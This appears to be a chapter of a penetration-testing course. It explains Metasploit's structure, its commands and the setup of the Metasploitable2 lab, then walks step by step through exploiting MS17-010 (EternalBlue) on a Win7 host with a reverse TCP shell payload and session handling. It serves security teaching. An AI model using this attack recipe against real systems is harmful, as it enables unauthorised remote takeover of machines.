7. Basic use of Metasploit penetration testing framework
7.1 Metasploit testing framework
7.1.1 Introduction to Metasploit
? Metasploit is a penetration testing platform that enables you to find, exploit and verify vulnerabilities. The platform includes the Metasploit framework and its commercial counterparts such as Metasploit Pro.
? Metasploit is a free, downloadable framework that makes it easy to exploit computer software vulnerabilities. It comes with professional-grade exploit tools for hundreds of known software vulnerabilities.
? Metasploit was originally designed to be an attack tool development platform.
? Official website https://www.metasploit.com/
7.1.2 Metasploit system framework
? 1. Basic library: The metasploit basic library file is located in the libraries directory under the source code root directory path, including Rex, framework-core and framework-base.
? Rex is the most basic components on which the entire framework depends, such as packaged network sockets, network application protocol client and server implementation, logging subsystem, penetration attack support routines, PostgreSQL and MySQL database support, etc.;
? The framework-core library is responsible for implementing all interactive interfaces with various types of upper-layer modules and plug-ins;
? The framework-base library extends framework-core, provides simpler wrapper routines, and provides some functional classes for handling various aspects of the framework. It is used to support user interfaces and functional programs to call the framework’s own functions and framework integration modules.
? 2. Module: Module organization is divided into 6 types of modules (Modules) according to different purposes:
? Divided into auxiliary module (AUX), penetration attack module (Exploits), post-penetration attack module (Post), attack load module (payloads), encoder module (Encoders), and empty command module (Nops).
? [Note] Payload is also called attack load. It is mainly used to establish a stable link between the target machine and the attack machine. It can return to the shell, and can also perform program injection, etc.
? 3. Plug-ins: Plug-ins can expand the functions of the framework, or assemble existing functions to form components with advanced features. Plug-ins can integrate some existing external security tools, such as Nessus, OpenVAS vulnerability scanner, etc., to provide some new functions for the user interface.
? 4. Interface: including msfconsole control terminal, msfcli command line, msfgui graphical interface, armitage graphical interface and msfapi remote calling interface.
? 5. Functional programs: metasploit also provides a series of functional programs that can be run directly, allowing penetration testers and security personnel to quickly use the internal capabilities of the metasploit framework to complete some specific tasks. For example, msfpayload, msfencode and msfvenom can encapsulate attack payloads into executable files, C language, JavaScript language and other forms, and can perform various types of encoding.
7.1.3 Metasploit directory structure
# /usr/share/metasploit-framework #ls // data: editable file used by Metasploit documentation: Provide documentation for the framework lib: framework code library modules: actual MSF modules plugins: plugins that can be loaded at runtime scripts: Meterpreter and other scripts tools: Various useful command line tools \t
7.2 Metasploitable2-Linux target system introduction
7.2.1 Metasploitable2-Linux target machine introduction
? The Metasploitable2 virtual system is a specially crafted Ubuntu operating system, itself designed as a security tool to test and demonstrate common vulnerability attacks.
Download the official website https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
7.2.2 Metasploitable2 installation
Unzip it first–> Open VMware –> [Open the virtual machine] –> Select the file –> [I have Copy the virtual machine] –> Log in as a normal user (user: msfadmin, password: msfadmin)
-- Modify user password $ sudo passwd username \t -- switch to root $ su root Password: 218853 \t -- Configure network (static IP) # vim /etc/network/interfaces ---------- auto lo iface lo inet loopback \t\t\t autoeth0 iface eth0 inet static address 192.168.1.180 netmask 255.255.255.0 gateway 192.168.1.1 ---------- -- Reset network # /etc/init.d/networking restart \t --Be sure to take a snapshot of the initial environment! ! !
7.3 Basic usage of Metasploit
? The Meetasploit program requires a Postgresql database.
Postgresql overview
? PostgreSQL is a free software object-relational database management system (ORDBMS) with very complete features. It is an object-relational database management system based on POSTGRES version 4.2 developed by the Department of Computer Science at the University of California.
? Official website https://www.postgresql.org/
? Kali has integrated Postgresql database environment.
? Postgresql is the world’s most advanced open source relational database (Relational)
-- Start the Postgresql service # systemctl start postgresql \t --Set Postgresql to start automatically at boot # systemctl enable postgresql \t -- Using Postgresql Application: 08-Exploit tool set --> metasploit framework Terminal: #msfconsole \t -- help command # help // Core Commands core commands (*) Module Commands module commands (*) Job Commands background task command (*) Resource Script Commands Resource Script Commands Database Script Commands database backend commands Credentials Backend Commands Certificate/credential backend commands Developer Commands Developer Commands \t
Common commands -- 1. The connect command in the core command The connect command is mainly used to connect to the host remotely. Generally used for intranet penetration. > connect xxxx.cn 80 //Connect to target port 80 [*]Connected to xxxx.cn:80 //Returning this information means the connection is successful get //Submit a get request and you can view the server version
-- 2. Module related show commands Valid parameters for the show command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options. - Example 1. List all penetration attack module exploits in the metasploit framework. > show exploits - Example 2. List all attack payloads in the metasploit framework > show payloads - Example 3. List all auxiliary attack payloads in the metasploit framework >show auxiliary \t\t\t
-- 3. Module related search search command (effectively solves the problem of long show command taking a long time)
> search service module name (such as mysql)
> search vulnerabilities (such as ms08_067)
- Search by name nmae
> search nmae: service module name
.....(Return content name: service name, Disclosure Date: release date, Rank: level, Check: check whether it can be exploited, Description: description)
- Search by path path
> search path: service module name
- Narrow the search scope through platform (search results generally have a higher rank)
> seach platform: service module name
[Note] platform platform
\t\t\t
-- 3.1 Search by type
The type command is used here
type: a specific type of module (exploit, paylooad, auxiliary, encoder, evasion, post, or nop)
> search type: service module name
[exploit] Penetration attack module
[auxiliary] Auxiliary attack module
\t
-- 3.2 Union search
Example> search type: exploit name: mysql
\t
-- 3.3 Search exploit-related modules based on CVE
> search CVE:CVE-2017-8464
- Example: View Linux-related vulnerability modules in 2021
> search cve:2021 name:linux
\t
[Note] Rank
? Each exploit module is marked with a Rank field based on their potential impact on the target system
? Each user can search, classify and sort vulnerability exploitation modules based on Rank.
? Rank arranged in descending order of reliability:
Excellent: The exploit will never crash the target server, like SQL injection, command execution, remote file inclusion, local file inclusion, etc. Unless there are special circumstances (typical memory corruption exploits would not be rated at this level).
Great: The exploit has a default target system, and can automatically detect the appropriate target system, or can fall back to a specific return address after a version check of the target service.
? good: The exploit has a default target system and is a “common case” for this type of software (Windows 7 for desktop applications, 2012 for servers, etc.)
? normal This exploit is reliable, but is version-specific and cannot be reliably automatically detected.
? average The exploit is unreliable or difficult to exploit.
? low This exploit is almost unexploitable (or less than 50% successful) for common platforms.
? manual The exploit is unstable or difficult to exploit and is based on a denial of service (DOS). If a module will only be used when the user specifically configures the module, otherwise the module will not be used, it can also be rated at this level.
[Note] CVE Overview
? Common Vulnerabilites & Exposure Common Vulnerabilities and Exposures. CVE is like a dictionary, giving a public name to widely recognized information security vulnerabilities or weaknesses that have been exposed. Using a common name can help users share data among separate vulnerability databases and vulnerability assessment tools, although these tools are difficult to integrate. This makes CVE a “keyword” for security information sharing. If you specify a vulnerability, such as a CVE name, in a vulnerability report, you can quickly find the corresponding patch information in any other CVE-compatible database to solve the security problem.
? Vulnerabilites Vulnerability; weakness. Exposure exposure; exposure
? [Expansion] The metasploit-framework exploit module for the CVE-2017-8464 vulnerability was disclosed on GitHub in 2017. This module was tested on Windows 10 x64 (Build 14393) and it works.
-- 4. Module related commands use [Background] The ms08_067 vulnerability was discovered by Microsoft in 2008. If the user receives a specially crafted RPC request on the affected system, the vulnerability may allow remote code execution. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker may exploit this vulnerability to run arbitrary code without authentication. - 1. First find the ms08_067 vulnerability module you want > search ms08_067 - 2. Load a penetration attack module > use module name //After using use to load the module, our bash prompt will change to the corresponding module information. This module can later be used for attacks. > back //Exit the current module
-- 4. Module related commands info
info displays module related information
- Method 1: > info module name
Example: > info exploit/windows/smb/ms08_067_netapi
- Method 2: > use info directly after loading the module
--Set RHOSTS parameters and specify the attack target machine > set RHOSTS xxx.xxx.xxx.xxx \t -- View the value of the setting > show options \t --Enter exploit or run to execute > exploit > run \t [Note] exit cannot be used, otherwise the Metasploit program will be exited directly.
7.4 Use msf to penetrate and attack Win7 hosts and execute commands remotely
7.4.1 Experimental environment
? Eternal Blue: Eternal Blue refers to the hacker group Shadow Brokers (Shadow Brokers) released a large number of network attack tools on the evening of April 14, 2017, including the “Eternal Blue” tool. “Eternal Blue” exploits the SMB vulnerability of the Windows system to obtain the highest system privileges. On May 12, criminals created the wannacry ransomware virus by modifying “Eternal Blue”. Many university intranets, large corporate intranets and government agency private networks in the UK, Russia, Europe and China were infected and were extorted to pay. A high ransom is required to decrypt the recovered files.
SMB of Windows system is used for file sharing (port 445: file sharing protocol).
Official description https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010
? EternalBlue-related viruses exploit Microsoft’s MS17-010 vulnerability. MS7-010 is a vulnerability in an underlying service of the Windows system. The malicious code will scan Windows machines with the 445 file sharing port open. No user operation is required. As long as the computer is turned on and connected to the Internet, criminals can implant ransomware and remotely control computers and servers. Trojans, virtual currency mining machines and other malicious programs.
7.4.2 Obtain the Win7 host remote shell through the msf module
- 1. Scan for ms17-010 vulnerability
# msfconsole //Open exploit tool
> search ms17-010 //Find vulnerability-related modules (auxiliary is used to assist in scanning exploits and used as attacks)
> use module name //Load an auxiliary module (for example.../scanner/...)
> show options //View which parameters need to be configured (required indicates whether it must be set, the port defaults to 445)
> set RHOSTS xxx.xxx.xxx.xxx //Set the target host
> run //Successful execution displays [+] indicating the existence of this vulnerability
> back //Exit module
\t
- 2. There are vulnerabilities, configure parameters, and implement attacks
> search ms17-010 //Find vulnerability module (eternalblue)
> use ... //Use the Eternal Blue attack module
> show options //View which parameters need to be configured (required indicates whether it must be set, the port defaults to 445)
> set RHOSTS xxx.xxx.xxx.xxx //Set the target host
> show targets //Used to view reproducible operating systems
> show payloads //Display all attack payloads (it is recommended to use search to find)
> search windows/x64/shell //Find applicable attack payloads
> set payload ... //Configure attack payload (Windows/x64/shell/reverse_tcp)
> show options //View configuration (LHOST local host LPORT local port, 4444 is the listening port, used to listen for rebound shells)
> set LHOST xxx.xxx.xxx.xxx //Configure local host
> show options //View the configuration and confirm again whether the modification is successful
> run //Display=-WIN-=Execution successful (press Enter to enter the Windows command line)
- 3. Remote execution of commands
system/> chcp 65001 //Solve the problem of garbled characters when Linux displays Windows commands
system/> whoami //Who am I, check current permissions (highest permission system)
system/> [Ctrl] + C //Disconnect session
\t
- 4.Extended operations
> exploit -j //Save to the background after successfully establishing the session
> sessions //View session save records
> sessions -i session id //Enter the session
system/> background //Save the session to the background (exit but not disconnect)
> sessions -k session id //Delete the session save record corresponding to the id
> sessions -h //View sessions related help
\t
Summary: Steps to use metasploit attack
1. Find vulnerabilities published by CVE
2. Find the corresponding exploit module
3. Configure module parameters
4. Add payload backdoor
5. Execute run or exploit to start the attack